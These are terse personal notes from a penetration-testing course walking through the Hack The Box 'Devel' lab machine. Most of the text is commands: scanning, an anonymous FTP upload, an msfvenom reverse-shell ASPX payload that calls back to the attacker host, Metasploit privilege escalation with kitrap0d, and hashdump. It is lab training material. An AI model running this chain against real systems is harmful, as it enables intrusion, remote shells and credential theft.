TCM PEH Hacking Jerry Notes

on under certs
1 minute read

HTB Devel

nmap -T4 -A -p- 10.10.10.5
Noted port 21 open
Noted possible web root dir at port 21 contents
Noted port 80
Noted possible default page at port 80
Noted Windows OS


Visited http://10.10.10.5:80
view source
Noted confirmed default webpage IIS7
dirbuster&
http://10.10.10.5:80
check more threads
usr/share/wordlist/dirbuster/*small.txt
check directories
check files
check recurse
file extention asm, asmx, asp, aspx, txt, zip, bak, rar
start


cd Desktop
ftp 10.10.10.5
anonymous
anonymous
help
ls
pwd
put dog.jpg
ls
Noted it did copy in dog.jpg


Googled msfvenom, looked for .asp payload format
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspx
msfconsole
use exploit/multi/handler
options
set payload windows/meterpreter/reverse_tcp
options
set LHOST 10.10.14.24
set LPORT 4444
run


ftp 10.10.10.5
anynomous
anonymous
binary
put ex.aspx


http://10.10.10.5/ex.aspx

In metasploit
sysinfo
getuid
Noted not root
hashdump
getsystem
background
search suggester
use post/multi/recon/local_exploit_suggester
set session 1
exploit
use /exploit/windows/local/ms10_015_kitrap0d
options
set session 1
options
exploit
Noted failed, but more options will show now
options
set LHOST 10.10.14.24
set LPORT 4445
exploit
Note failed because listener died
use exploit/multi/handler
options
run
background
use /exploit/windows/local/ms10_015_kitrap0d
set session 2
options
exploit
Noted meterpreter shell
getuid
Noted root
hashdump

certs, pwned
comments powered by Disqus